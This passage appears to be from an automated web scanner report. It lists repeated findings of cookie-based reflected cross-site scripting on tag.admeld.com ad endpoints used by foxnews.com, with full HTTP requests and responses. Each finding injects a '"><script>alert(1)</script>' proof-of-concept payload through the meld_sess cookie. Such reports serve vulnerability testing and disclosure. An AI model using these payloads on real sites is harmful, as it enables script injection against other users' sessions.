Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Tue, 12-Apr-2011 16:21:21 GMT
Set-Cookie: qcms=1; domain=collective-media.net; path=/; expires=Tue, 12-Apr-2011 16:21:21 GMT
Set-Cookie: nadp=1; domain=collective-media.net; path=/; expires=Mon, 18-Apr-2011 16:21:21 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Tue, 12-Apr-2011 00:21:21 GMT
Content-Length: 8007

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
</scr'+'ipt>');CollectiveMedia.addPixel("http://ib.adnxs.com/mapuid?member=311&user=11f3c48b4c0582ba52cd";alert(1)//cff7d8c4d5c&seg_code=noseg&ord=1302538881",true);CollectiveMedia.addPixel("http://pixel.quantserve.com/pixel/p-86ZJnSph3DaTI.gif",false);CollectiveMedia.addPixel("http://r.nexac.com/e/getdata.xgi?dt=br&pkey=xkeii
...[SNIP]...

1.152. http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom [meld_sess cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/3/foxnews/300x250/politics-bottom

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c259c"><script>alert(1)</script>70b3c2b66bd was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/3/foxnews/300x250/politics-bottom?t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=e36a2f20-9985-4dcd-82e9-6ff0312e024ec259c"><script>alert(1)</script>70b3c2b66bd

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: ...[SNIP]...
Content-Length: 2010
Content-Type: text/html
Date: Mon, 11 Apr 2011 16:21:27 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:px;height:px;margin:0;border:0">


<s
...[SNIP]...
0" height="0" border="0" marginwidth="0" marginheight="0" frameborder="0" src="http://r.turn.com/server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024ec259c"><script>alert(1)</script>70b3c2b66bd&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match">
...[SNIP]...

1.153. http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom [meld_sess cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/3/foxnews/300x250/politics-bottom

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25824"><script>alert(1)</script>9bc617e1123 was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/3/foxnews/300x250/politics-bottom?t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=e36a2f20-9985-4dcd-82e9-6ff0312e024e25824"><script>alert(1)</script>9bc617e1123

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: ...[SNIP]...
Content-Length: 2010
Content-Type: text/html
Date: Mon, 11 Apr 2011 16:21:26 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:px;height:px;margin:0;border:0">


<s
...[SNIP]...
<script type="text/javascript" src="http://pixel.invitemedia.com/admeld_sync?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e25824"><script>alert(1)</script>9bc617e1123&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match">
...[SNIP]...

1.154. http://tag.admeld.com/ad/iframe/3/foxnews/300x250/ros [meld_sess cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/3/foxnews/300x250/ros

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de73b"><script>alert(1)</script>f2fe86a46e was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/3/foxnews/300x250/ros?t=1302539475029&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=e36a2f20-9985-4dcd-82e9-6ff0312e024ede73b"><script>alert(1)</script>f2fe86a46e; D41U=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: ...[SNIP]...
Content-Length: 1670
Content-Type: text/html
Date: Mon, 11 Apr 2011 16:31:25 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:px;height:px;margin:0;border:0">



...[SNIP]...
0" height="0" border="0" marginwidth="0" marginheight="0" frameborder="0" src="http://r.turn.com/server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024ede73b"><script>alert(1)</script>f2fe86a46e&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match">
...[SNIP]...

1.155. http://tag.admeld.com/ad/iframe/3/foxnews/300x250/ros [meld_sess cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/3/foxnews/300x250/ros

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25071"><script>alert(1)</script>90866a0e48e was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/3/foxnews/300x250/ros?t=1302539475029&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=e36a2f20-9985-4dcd-82e9-6ff0312e024e25071"><script>alert(1)</script>90866a0e48e; D41U=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: ...[SNIP]...
Content-Length: 1674
Content-Type: text/html
Date: Mon, 11 Apr 2011 16:31:24 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:px;height:px;margin:0;border:0">



...[SNIP]...
<script type="text/javascript" src="http://pixel.invitemedia.com/admeld_sync?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e25071"><script>alert(1)</script>90866a0e48e&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match">
...[SNIP]...

1.156. http://tag.admeld.com/ad/iframe/3/foxnews/728x90/politics [meld_sess cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/3/foxnews/728x90/politics

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f65d4"><script>alert(1)</script>c7aac3109a7 was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/3/foxnews/728x90/politics?t=1302540075597&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=e36a2f20-9985-4dcd-82e9-6ff0312e024ef65d4"><script>alert(1)</script>c7aac3109a7; D41U=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: ...[SNIP]...
Content-Length: 1673
Content-Type: text/html
Date: Mon, 11 Apr 2011 16:41:22 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:px;height:px;margin:0;border:0">



...[SNIP]...
0" height="0" border="0" marginwidth="0" marginheight="0" frameborder="0" src="http://r.turn.com/server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024ef65d4"><script>alert(1)</script>c7aac3109a7&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match">
...[SNIP]...

1.157. http://tag.admeld.com/ad/iframe/3/foxnews/728x90/politics [meld_sess cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/3/foxnews/728x90/politics

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3fb3"><script>alert(1)</script>4fd93403c0d was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/3/foxnews/728x90/politics?t=1302540075597&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=e36a2f20-9985-4dcd-82e9-6ff0312e024ec3fb3"><script>alert(1)</script>4fd93403c0d; D41U=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: ...[SNIP]...
Content-Length: 1673
Content-Type: text/html
Date: Mon, 11 Apr 2011 16:41:21 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:px;height:px;margin:0;border:0">



...[SNIP]...
<script type="text/javascript" src="http://pixel.invitemedia.com/admeld_sync?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024ec3fb3"><script>alert(1)</script>4fd93403c0d&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match">
...[SNIP]...

1.158. http://tag.admeld.com/ad/iframe/3/foxnews/728x90/ros [meld_sess cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/3/foxnews/728x90/ros

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 292b6"><script>alert(1)</script>f08dbb572df was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/3/foxnews/728x90/ros?t=1302543075864&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=e36a2f20-9985-4dcd-82e9-6ff0312e024e292b6"><script>alert(1)</script>f08dbb572df; D41U=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: ...[SNIP]...
Content-Length: 1673
Content-Type: text/html
Date: Mon, 11 Apr 2011 17:31:22 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:px;height:px;margin:0;border:0">



...[SNIP]...
0" height="0" border="0" marginwidth="0" marginheight="0" frameborder="0" src="http://r.turn.com/server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e292b6"><script>alert(1)</script>f08dbb572df&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match">
...[SNIP]...

1.159. http://tag.admeld.com/ad/iframe/3/foxnews/728x90/ros [meld_sess cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/3/foxnews/728x90/ros

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1db9d"><script>alert(1)</script>278531f8b82 was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/3/foxnews/728x90/ros?t=1302543075864&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=e36a2f20-9985-4dcd-82e9-6ff0312e024e1db9d"><script>alert(1)</script>278531f8b82; D41U=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: ...[SNIP]...
Content-Length: 1673
Content-Type: text/html
Date: Mon, 11 Apr 2011 17:31:21 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:px;height:px;margin:0;border:0">



...[SNIP]...
<script type="text/javascript" src="http://pixel.invitemedia.com/admeld_sync?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e1db9d"><script>alert(1)</script>278531f8b82&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match">
...[SNIP]...

1.160. http://tag.admeld.com/ad/iframe/3/foxnewsrtb/300x250/ros [meld_sess cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/3/foxnewsrtb/300x250/ros

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df14e"><script>alert(1)</script>027a0ae2e79 was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/3/foxnewsrtb/300x250/ros?t=1302544276627&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=e36a2f20-9985-4dcd-82e9-6ff0312e024edf14e"><script>alert(1)</script>027a0ae2e79; D41U=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: ...[SNIP]...
Content-Length: 1674
Content-Type: text/html
Date: Mon, 11 Apr 2011 17:51:26 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:px;height:px;margin:0;border:0">



...[SNIP]...
<img width="0" height="0" src="http://p.brilig.com/contact/bct?pid=21008FFD-5920-49E9-AC20-F85A35BDDE15&_ct=pixel&puid=e36a2f20-9985-4dcd-82e9-6ff0312e024edf14e"><script>alert(1)</script>027a0ae2e79&REDIR=http://tag.admeld.com/pixel?admeld_dataprovider_id=27&external_user_id=1&_m=1&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024edf14e">
...[SNIP]...

1.161. http://tag.admeld.com/ad/iframe/3/foxnewsrtb/300x250/ros [meld_sess cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/3/foxnewsrtb/300x250/ros

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94090"><script>alert(1)</script>c17b581f298 was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/3/foxnewsrtb/300x250/ros?t=1302544276627&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=e36a2f20-9985-4dcd-82e9-6ff0312e024e94090"><script>alert(1)</script>c17b581f298; D41U=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: ...[SNIP]...
Content-Length: 1674
Content-Type: text/html
Date: Mon, 11 Apr 2011 17:51:26 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:px;height:px;margin:0;border:0">



...[SNIP]...
0" height="0" border="0" marginwidth="0" marginheight="0" frameborder="0" src="http://r.turn.com/server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e94090"><script>alert(1)</script>c17b581f298&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match">
...[SNIP]...

1.162. http://tag.admeld.com/ad/iframe/3/foxnewsrtb/728x90/ros [meld_sess cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/3/foxnewsrtb/728x90/ros

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6816"><script>alert(1)</script>c086142570 was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/3/foxnewsrtb/728x90/ros?t=1302538875852&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=e36a2f20-9985-4dcd-82e9-6ff0312e024ef6816"><script>alert(1)</script>c086142570

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1993
Content-Type: text/html
Date: Mon, 11 Apr 2011 16:21:27 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:px;height:px;margin:0;border:0">


<s
...[SNIP]...
0" height="0" border="0" marginwidth="0" marginheight="0" frameborder="0" src="http://r.turn.com/server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024ef6816"><script>alert(1)</script>c086142570&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match">
...[SNIP]...

1.163. http://tag.admeld.com/ad/iframe/3/foxnewsrtb/728x90/ros [meld_sess cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/3/foxnewsrtb/728x90/ros

Issue detail

